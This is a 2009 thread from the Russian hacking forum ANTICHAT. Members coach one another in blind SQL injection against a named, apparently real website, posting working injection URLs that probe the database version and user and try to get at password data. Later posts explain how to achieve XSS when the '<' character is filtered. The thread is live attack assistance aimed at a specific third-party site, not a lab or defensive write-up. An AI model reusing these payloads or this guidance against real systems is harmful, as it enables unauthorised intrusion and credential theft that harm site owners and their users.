ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9521  
Старый 23.10.2009, 11:07
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 568
С нами: 9030566

Репутация: 2017


По умолчанию

Это называется blind -sql -inj

то есть при правильном запросе у тебя выдаст страницу которая должна быть, при не правильном , в твоем случае , вообще ни чего.
то есть при http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=5+--+ выдаст страницу , а при http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=4+--+ ни чего не выводит,
 
Ответить с цитированием

  #9522  
Старый 23.10.2009, 11:59
Patrik
Познающий
Регистрация: 15.01.2006
Сообщений: 45
С нами: 10693512

Репутация: 16
По умолчанию

Вот только строки user() нету. Что делать? Т.е. substring(user(),1,1) не обрабатывается.
 
Ответить с цитированием

  #9523  
Старый 23.10.2009, 12:01
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами: 9204308

Репутация: 256
По умолчанию

Цитата:
Сообщение от DeluxeS  
Ошибка такая:
Error in /script.php:Table 'database.tabla' doesn't exist
Что не так? (
Всё просто, в текущей БД database нет таблицы tabla
Цитата:
Сообщение от Patrik  
Вот только строки user() нету. Что делать? Т.е. substring(user(),1,1) не обрабатывается.
_ttp://apg-ua.com/index.php?o=66+AND+SUBSTRING(UsEr(),1,1)=0+--+

Последний раз редактировалось DrAssault; 23.10.2009 в 12:05..
 
Ответить с цитированием

  #9524  
Старый 23.10.2009, 12:13
Patrik
Познающий
Регистрация: 15.01.2006
Сообщений: 45
С нами: 10693512

Репутация: 16
По умолчанию

Цитата:
Сообщение от DrAssault  
_ttp://apg-ua.com/index.php?o=66+AND+SUBSTRING(UsEr(),1,1)=0+--+
Получается строка user пустая. Где тогда искать?
 
Ответить с цитированием

  #9525  
Старый 23.10.2009, 12:31
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Patrik,
_http://forum.antichat.ru/thread119047.html , _https://forum.antichat.ru/threadnav35207-1-10.html
 
Ответить с цитированием

  #9526  
Старый 23.10.2009, 14:02
Patrik
Познающий
Регистрация: 15.01.2006
Сообщений: 45
С нами: 10693512

Репутация: 16
По умолчанию

_http://apg-ua.com/index.php?o=66+AND+substring(Password(),1,1)<100--
Пол царства за имя поля с паролем
 
Ответить с цитированием

  #9527  
Старый 23.10.2009, 15:07
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Значит у меня к вам следующий вопрос. ©
Возможно ли провести XSS атаку, если фильтруется символ < ???
 
Ответить с цитированием

  #9528  
Старый 23.10.2009, 15:13
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию

Цитата:
Сообщение от Nightmarе  
Значит у меня к вам следующий вопрос. ©
Возможно ли провести XSS атаку, если фильтруется символ < ???
нет
 
Ответить с цитированием

  #9529  
Старый 23.10.2009, 15:23
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию

Цитата:
Сообщение от Nightmarе  
Значит у меня к вам следующий вопрос. ©
Возможно ли провести XSS атаку, если фильтруется символ < ???
Возможно, если XSS внутри тега, к примеру:
Код:
<a href="[XSS]">link</a>
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #9530  
Старый 23.10.2009, 15:51
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

в атрибутах тэгов, css-стилях, также не забываем про dom-based xss
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.